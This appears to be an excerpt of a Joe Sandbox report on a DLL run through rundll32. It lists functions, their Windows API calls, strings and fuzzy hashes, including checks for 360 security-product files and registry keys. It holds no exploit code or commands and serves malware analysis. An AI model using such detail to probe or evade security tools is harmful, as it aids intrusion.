
Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AppendPath$CloseFileHeapModuleNameProcess_wcsicmpmemset
String ID: 360EntSecurity$360Safe$?$SOFTWARE\$SOFTWARE\Wow6432Node\
API String ID: 2226481571-3054377637
Opcode ID: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
Instruction ID: 5d79a3dbe08d97a28ec647ffc4188a53122dfd3fad7d09cd3595c12d58dad182
Opcode Fuzzy Hash: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
Instruction Fuzzy Hash: 211261B2701A4886EB419B69C8413DD73A1FB85BF4F448711AA3D977E5DF78CA89C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004C720 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 000000018004C7EF
??_V@YAXPEAX@Z.MSVCRT ref: 000000018004C802
??3@YAXPEAX@Z.MSVCRT ref: 000000018004C815
_wtoi.MSVCRT ref: 000000018004C918

Part of subcall function 000000018004CD44: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018004CDF5

SysFreeString.OLEAUT32 ref: 000000018004C9F7

Strings

//reccfg/wndclass, xrefs: 000000018004C79A

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: FreeString$??2@??3@_wtoi
String ID: //reccfg/wndclass
API String ID: 1119205991-3779619899
Opcode ID: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
Instruction ID: aac1c87dd54dd223690f6a51cef8bcee3ce48f855a47f00273c96f55abf577db
Opcode Fuzzy Hash: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
Instruction Fuzzy Hash: D5B17A32701E489AEB81CF79C4803DC33A0F749B98F058626EA1E57B98DF38CA59C345

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180042664 Relevance: 10.7, APIs: 7, Instructions: 237networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180042CB8: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180042715), ref: 0000000180042D94

htons.WS2_32 ref: 00000001800427AA
htonl.WS2_32 ref: 00000001800427B7
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800428C1
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042920
memmove.MSVCRT ref: 0000000180042957

Part of subcall function 0000000180043090: MultiByteToWideChar.KERNEL32 ref: 00000001800430C2
Part of subcall function 0000000180043090: ??_V@YAXPEAX@Z.MSVCRT ref: 00000001800430E0
Part of subcall function 0000000180043090: MultiByteToWideChar.KERNEL32 ref: 0000000180043129

??_V@YAXPEAX@Z.MSVCRT ref: 00000001800429A0
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800429CB

Part of subcall function 0000000180043214: htonl.WS2_32 ref: 0000000180043230

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide$htonl$htonsmemmove
String ID:
API String ID: 2604728826-0
Opcode ID: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
Instruction ID: c6a7ef21b5906d6b557d77442a06c91d81bd98b5ee7ca8850e16d0b233cac89c
Opcode Fuzzy Hash: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
Instruction Fuzzy Hash: 21B15B36704B848AE792CF61F48039EB7B5F748788F518015EE8917A98CF38D65DDB48

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180068020 Relevance: 10.7, APIs: 7, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

memmove.MSVCRT ref: 000000018006809D
??3@YAXPEAX@Z.MSVCRT ref: 0000000180068131
??3@YAXPEAX@Z.MSVCRT ref: 000000018006818D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000018001AF0F), ref: 00000001800681DE
_CxxThrowException.MSVCRT ref: 0000000180068219
?terminate@@YAXXZ.MSVCRT ref: 00000001800682C7
?terminate@@YAXXZ.MSVCRT ref: 00000001800682CD

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@?terminate@@$ErrorExceptionLastThrowmemmove
String ID:
API String ID: 223594506-0
Opcode ID: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
Instruction ID: fcc32ee8dbcfcc96106fa9aa2d9edb036d58ed735eb2ced8cd8263455d285739
Opcode Fuzzy Hash: abe36e33305c97acef1d384f130b573a12daa0eb5c7ec11c20e9a8599c7bd32e
Instruction Fuzzy Hash: 0971E472210B8882EB559F19E8403DE6321FB8DBD4F608611FBAD47B96DF38C699C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000CB00 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 189COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

SHGetValueW.SHLWAPI ref: 000000018000CBF6
_time64.MSVCRT ref: 000000018000CC10

Part of subcall function 0000000180070DD0: _errno.MSVCRT ref: 0000000180070DDE

Part of subcall function 0000000180070DD0: _errno.MSVCRT ref: 0000000180070E1F

SHGetValueW.SHLWAPI ref: 000000018000CD0C

Strings

CloudCfg, xrefs: 000000018000CBBA
%s_count, xrefs: 000000018000CB87
%s_lasttime, xrefs: 000000018000CB9B

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Value_errno$HeapProcess_time64
String ID: %s_count$%s_lasttime$CloudCfg
API String ID: 2146318826-610660357
Opcode ID: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
Instruction ID: 0a7454a278269eadbb0ffce7cefadb2dc21e45630bc3a54506c3f9663c92b6cc
Opcode Fuzzy Hash: 391d25aba3b16aa89747ead15b5123f6840dc9e57769fc6a8d330c04b0e76dac
Instruction Fuzzy Hash: DC819572215B4986EB91DB64D4807DE77A0F7887E4F508226FA5E437E9DF38CA48CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E478 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32 ref: 000000018000E612
GetHGlobalFromStream.OLE32 ref: 000000018000E64C
GlobalLock.KERNEL32 ref: 000000018000E65F
GlobalSize.KERNEL32 ref: 000000018000E66C

Part of subcall function 000000018000E6F8: ??3@YAXPEAX@Z.MSVCRT ref: 000000018000E74D

GlobalUnlock.KERNEL32 ref: 000000018000E6BE

Strings

__Location__, xrefs: 000000018000E59C

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Global$Stream$??3@CreateFromLockSizeUnlock
String ID: __Location__
API String ID: 3539542440-1240413640
Opcode ID: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
Instruction ID: 0f7485e4f93bbca4fed8cf01455b67f1128db3508264a427a58b068d72c2ae23
Opcode Fuzzy Hash: 258c331e991ad95c783ef0416d4c37d993b248583095014714736d7ddb22313c
Instruction Fuzzy Hash: A6818072700A4885EB46DB75D8403DC3761F749BE8F548216EA2E577E5DF34CA89C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008C68 Relevance: 10.6, APIs: 7, Instructions: 125COMMON

Download Yara Rule

APIs

CharNextW.USER32 ref: 0000000180008CA7
CharNextW.USER32 ref: 0000000180008CD3
CharNextW.USER32 ref: 0000000180008CED
CharNextW.USER32 ref: 0000000180008D05
CharNextW.USER32 ref: 0000000180008D14
CharNextW.USER32 ref: 0000000180008D81
CharNextW.USER32 ref: 0000000180008DA5

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: f29f1362136db7183f5f3bb7661024df541b93d863d4b8e8a836a3b8ce17e584
Instruction ID: 1492bbbb0fb01b81f8d7bc8417cc5d1fdb32638e21ab672acd404a2c35c9a6c4
Opcode Fuzzy Hash: f29f1362136db7183f5f3bb7661024df541b93d863d4b8e8a836a3b8ce17e584
Instruction Fuzzy Hash: 5B417236615A9881FBA2CF11D4143A833E0FB5CBD4F44C412EB8A47795EF78C7AA9305

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C97C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000CB00: SHGetValueW.SHLWAPI ref: 000000018000CBF6
Part of subcall function 000000018000CB00: _time64.MSVCRT ref: 000000018000CC10

_time64.MSVCRT ref: 000000018000C9A2

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

SHSetValueW.SHLWAPI ref: 000000018000CA52
SHSetValueW.SHLWAPI ref: 000000018000CA73

Strings

CloudCfg, xrefs: 000000018000CA14
%s_count, xrefs: 000000018000C9EC
%s_lasttime, xrefs: 000000018000C9FF

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Value$_time64$HeapProcess
String ID: %s_count$%s_lasttime$CloudCfg
API String ID: 1319719158-610660357
Opcode ID: 633e9513b59cb82dbd4c42a8dfc42ca5507bcd6ec68c6f3b38eaf980b99686d7
Instruction ID: 831a43b99bf02356c207f364941f14581f3732c075b2ce428cfbfee20bf611f1
Opcode Fuzzy Hash: 633e9513b59cb82dbd4c42a8dfc42ca5507bcd6ec68c6f3b38eaf980b99686d7
Instruction Fuzzy Hash: 6D416CB2701B4486EB51DB29D84079D37A1FB89BF8F048325AA2E577E5DF38C688C341

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC85B670 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 00000187EC85B6DE
MapViewOfFile.KERNEL32 ref: 00000187EC85B711
VirtualFree.KERNEL32 ref: 00000187EC85B815
UnmapViewOfFile.KERNEL32 ref: 00000187EC85B82D
CloseHandle.KERNEL32 ref: 00000187EC85B838

Strings

@, xrefs: 00000187EC85B6F8

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
String ID: @
API String ID: 1610889594-2766056989
Opcode ID: a436dfbeec11fa72cacc95f9423c30dfac001b64611d56dab0d816701a932b9f
Instruction ID: 3242362cd24d40e1b7409e3a43a7f5f06e2d1c35984bcd5c3d6d67d26b755bbb
Opcode Fuzzy Hash: a436dfbeec11fa72cacc95f9423c30dfac001b64611d56dab0d816701a932b9f
Instruction Fuzzy Hash: 7B51323A228B8581EB50DB15E5803AAB7A1F7D4794F609061EB8E43BE5DF7CC544C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005AAEC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000000018005AB3A
PathAppendW.SHLWAPI ref: 000000018005AB4B

Part of subcall function 000000018001A470: CreateFileW.KERNEL32 ref: 000000018001A4E8
Part of subcall function 000000018001A470: GetFileSizeEx.KERNEL32 ref: 000000018001A4FF
Part of subcall function 000000018001A470: ??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001A51D
Part of subcall function 000000018001A470: ReadFile.KERNEL32 ref: 000000018001A53A
Part of subcall function 000000018001A470: CloseHandle.KERNEL32 ref: 000000018001A567

??_U@YAPEAX_K@Z.MSVCRT ref: 000000018005ABCC
memmove.MSVCRT ref: 000000018005ABDE
??_V@YAXPEAX@Z.MSVCRT ref: 000000018005ABEB

Strings

..\config\msgcenter64.dat, xrefs: 000000018005AB40

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: File$AppendCloseCreateHandleModuleNamePathReadSizememmove
String ID: ..\config\msgcenter64.dat
API String ID: 1552649294-925171115
Opcode ID: 2b6bc0a9826245997d2484599f869692e6608d281a15ca6de91b59abf58e858d
Instruction ID: 6037bf8a0cbc718679defd9cfc68d096276397db31603676c3dd85afabd3a34b
Opcode Fuzzy Hash: 2b6bc0a9826245997d2484599f869692e6608d281a15ca6de91b59abf58e858d
Instruction Fuzzy Hash: A1316032604B8886E751CF61E8447CDBBA4F389BD4F508115FEA917BA8CF38C64ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180056534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180056572
GetModuleFileNameW.KERNEL32 ref: 0000000180056589
PathAppendW.SHLWAPI ref: 00000001800565AD

Part of subcall function 0000000180056400: memset.MSVCRT ref: 00000001800564A0
Part of subcall function 0000000180056400: RegCloseKey.ADVAPI32 ref: 00000001800564F2

_wcsicmp.MSVCRT ref: 00000001800565C8
PathAppendW.SHLWAPI ref: 00000001800565DE
PathFileExistsW.SHLWAPI ref: 00000001800565FA

Strings

safemon\360EDRSensor.exe, xrefs: 00000001800565D2

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
String ID: safemon\360EDRSensor.exe
API String ID: 2297386589-1382049097
Opcode ID: 42f0aba2aa1986b903558ee18fe79d01fe9ddf52126576828c9ac8a665b693b0
Instruction ID: b56041483c5d1cc8e669a9f5834781a952b0b95e5cd2a6710febed08a80e77bc
Opcode Fuzzy Hash: 42f0aba2aa1986b903558ee18fe79d01fe9ddf52126576828c9ac8a665b693b0
Instruction Fuzzy Hash: 44315071724A4886EA91DB24EC9439973A0FB8C7A4F409215B96E436F5EF39C74DC700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800562D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018005630E
GetModuleFileNameW.KERNEL32 ref: 0000000180056325
PathAppendW.SHLWAPI ref: 0000000180056349

Part of subcall function 000000018005619C: memset.MSVCRT ref: 000000018005623C
Part of subcall function 000000018005619C: RegCloseKey.ADVAPI32 ref: 000000018005628E

_wcsicmp.MSVCRT ref: 0000000180056364
PathAppendW.SHLWAPI ref: 000000018005637A
PathFileExistsW.SHLWAPI ref: 0000000180056396

Strings

safemon\360ExtHost.exe, xrefs: 000000018005636E

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Path$AppendFilememset$CloseExistsModuleName_wcsicmp
String ID: safemon\360ExtHost.exe
API String ID: 2297386589-1382862812
Opcode ID: fc9508a032b388f95354c21349e4f50a604572e192d3fc7bf2bb7d329c5c28e2
Instruction ID: 6ff1a21142ab4c8bd4a0b27ef24c26924cb25d1c518f26ee789ee6da218a3a52
Opcode Fuzzy Hash: fc9508a032b388f95354c21349e4f50a604572e192d3fc7bf2bb7d329c5c28e2
Instruction Fuzzy Hash: E7316F71724A4886EBA1DB24EC943997360FB8C7A4F409215B96E836F5DF39C74CCB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000892C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000180008966
GetProcAddress.KERNEL32 ref: 000000018000897B
RegOpenKeyExW.ADVAPI32 ref: 00000001800089CE
RegCloseKey.ADVAPI32 ref: 00000001800089E0

Strings

Advapi32.dll, xrefs: 000000018000895F
RegOpenKeyTransactedW, xrefs: 0000000180008971

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: e5aa230e6d6d73d44fbb0867bef8b98e7cffe5e7cefdcdffa37db2e7ba59e934
Instruction ID: bf9e62a3942db8529e652a7a00b11324bbad2056b1e05bdd0101147039c14a4a
Opcode Fuzzy Hash: e5aa230e6d6d73d44fbb0867bef8b98e7cffe5e7cefdcdffa37db2e7ba59e934
Instruction Fuzzy Hash: E7218E32604B4482EB92DF02F8543A973A0FB8CBD0F088025AED947B54DF3CC659D701

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004410C Relevance: 10.6, APIs: 7, Instructions: 58COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180044136
memset.MSVCRT ref: 0000000180044147
_time64.MSVCRT ref: 0000000180044156

Part of subcall function 000000018003BC0C: CryptAcquireContextW.ADVAPI32 ref: 000000018003BC33
Part of subcall function 000000018003BC0C: GetLastError.KERNEL32 ref: 000000018003BC3D
Part of subcall function 000000018003BC0C: CryptAcquireContextW.ADVAPI32 ref: 000000018003BC62

_time64.MSVCRT ref: 000000018004417C
srand.MSVCRT ref: 0000000180044185
rand.MSVCRT ref: 000000018004418B
LeaveCriticalSection.KERNEL32 ref: 00000001800441C5

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AcquireContextCriticalCryptSection_time64$EnterErrorLastLeavememsetrandsrand
String ID:
API String ID: 1109857607-0
Opcode ID: 8a34afe03370e941922b9fa1342c3f51188d8ab34ab1c1fde89d7cbfdbbd1467
Instruction ID: ca70be7a54b7a8b6e3e4f55ca6010b26a0c6ab118fec8c1b3c60b99ca43e49b7
Opcode Fuzzy Hash: 8a34afe03370e941922b9fa1342c3f51188d8ab34ab1c1fde89d7cbfdbbd1467
Instruction Fuzzy Hash: 7521A132B10B4482E7559F25E84439C77A5FB99F98F059225DA690BBA5CF38C68AC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180084E36 Relevance: 10.6, APIs: 7, Instructions: 50memorysynchronizationCOMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 0000000180084E55

Part of subcall function 000000018006DB10: GetProcessHeap.KERNEL32 ref: 000000018006DB1C
Part of subcall function 000000018006DB10: HeapLock.KERNEL32 ref: 000000018006DB2D
Part of subcall function 000000018006DB10: HeapWalk.KERNEL32 ref: 000000018006DB40
Part of subcall function 000000018006DB10: HeapFree.KERNEL32 ref: 000000018006DB88
Part of subcall function 000000018006DB10: HeapUnlock.KERNEL32 ref: 000000018006DB91

ReleaseMutex.KERNEL32 ref: 0000000180084E73
TlsFree.KERNEL32 ref: 0000000180084E8D
CloseHandle.KERNEL32 ref: 0000000180084E9B
GetProcessHeap.KERNEL32 ref: 0000000180084EAA
HeapFree.KERNEL32 ref: 0000000180084EBD
CloseHandle.KERNEL32 ref: 0000000180084ECD

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$CloseHandleProcess$ExceptionLockMutexReleaseThrowUnlockWalk
String ID:
API String ID: 2337826640-0
Opcode ID: 5ebd4694b0cf8b1b0e10d1caafe6c046652a29d11f97caa12330084f2d285228
Instruction ID: 33d5259c6290a7581a5ad5f3dc980324b092c5f168283266ec493f33f9dd72fa
Opcode Fuzzy Hash: 5ebd4694b0cf8b1b0e10d1caafe6c046652a29d11f97caa12330084f2d285228
Instruction Fuzzy Hash: BB111632601A49CAEB869F21EC543E82360FB4CBD5F19D525BA190B6A5DF34C75DC340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180064040 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 000000018006405B
SysFreeString.OLEAUT32 ref: 0000000180064070
SysFreeString.OLEAUT32 ref: 0000000180064085
SysFreeString.OLEAUT32 ref: 000000018006409A
SysFreeString.OLEAUT32 ref: 00000001800640AF
SysFreeString.OLEAUT32 ref: 00000001800640C4
SysFreeString.OLEAUT32 ref: 00000001800640D9

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 73e3a869f78964b23eaffc721e09444bf3a0d7b676e7666a508320a6b867a5bd
